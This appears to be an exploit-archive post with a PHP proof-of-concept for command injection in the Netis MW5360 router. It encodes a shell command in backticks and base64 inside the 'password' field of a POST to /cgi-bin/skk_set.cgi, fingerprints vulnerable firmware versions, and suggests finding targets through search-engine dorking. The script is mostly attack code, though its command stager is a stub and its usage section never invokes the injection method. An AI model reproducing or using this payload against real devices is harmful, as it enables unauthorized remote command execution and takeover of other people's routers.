Netis MW5360 Code Injection

`=============================================================================================================================================  
| # Title : Netis MW5360 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.netis-systems.com/products/MW5360.html |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 67 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
class NetisRouterExploit {  
private $targetUri;  
private $cmdDelay;  
  
public function __construct($targetUri = '/', $cmdDelay = 30) {  
$this->targetUri = $targetUri;  
$this->cmdDelay = $cmdDelay;  
}  
  
public function executeCommand($cmd) {  
// Clean up payload file if command includes chmod  
if (strpos($cmd, 'chmod +x') !== false) {  
$this->registerFilesForCleanup(trim(explode('+x', $cmd)[1]));  
}  
  
// Skip command removal for payload cleanup  
if (strpos($cmd, 'rm -f') === false) {  
$payload = base64_encode("`$cmd`");  
echo "Executing $cmd\n";  
$this->sendRequest('/cgi-bin/skk_set.cgi', [  
'password' => $payload,  
'quick_set' => 'ap',  
'app' => 'wan_set_shortcut'  
]);  
}  
}  
  
public function check() {  
echo "Checking if target can be exploited.\n";  
$res = $this->sendRequest('/cgi-bin/skk_get.cgi', [  
'mode_name' => 'skk_get',  
'wl_link' => 0  
]);  
  
if ($res === false || strpos($res['body'], 'version') === false) {  
return "Unknown: No valid response received from target.";  
}  
  
preg_match('/.?(version).?\s*:\s*.?((\\|[^,])*)/', $res['body'], $matches);  
if (isset($matches[2])) {  
$version_number = strtoupper(trim(explode('-V', $matches[2])[1]));  
$model_number = strtoupper(trim(explode('-V', $matches[2])[0]));  
  
if (strpos($model_number, '-') !== false) {  
$model_number = trim(explode('-', $model_number)[1]);  
} else {  
$model_number = trim(explode('(', $model_number)[1]);  
}  
  
if ($model_number == 'MW5360' && version_compare($version_number, '1.0.1.3442', '<=')) {  
return "Appears: Version " . $matches[2];  
}  
  
return "Safe: Version " . $matches[2];  
}  
  
return "Safe";  
}  
  
public function exploit() {  
echo "Executing exploit with payload.\n";  
$this->executeCmdStager(['noconcat' => true, 'delay' => $this->cmdDelay]);  
}  
  
private function sendRequest($uri, $postData) {  
$url = "http://target_ip" . $this->targetUri . $uri; // Replace 'target_ip' with actual target IP  
$options = [  
'http' => [  
'header' => "Content-type: application/x-www-form-urlencoded\r\n",  
'method' => 'POST',  
'content' => http_build_query($postData),  
],  
];  
$context = stream_context_create($options);  
$result = file_get_contents($url, false, $context);  
  
if ($result === FALSE) {  
return false;  
}  
  
return ['body' => $result];  
}  
  
private function registerFilesForCleanup($filename) {  
echo "Registering $filename for cleanup.\n";  
// Logic to clean up the file after execution.  
}  
  
private function executeCmdStager($options) {  
echo "Executing command stager with options: " . print_r($options, true) . "\n";  
// Implement the command stager logic here  
}  
}  
  
// Usage  
$exploit = new NetisRouterExploit('/');  
$exploit->check();  
$exploit->exploit();  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================  
`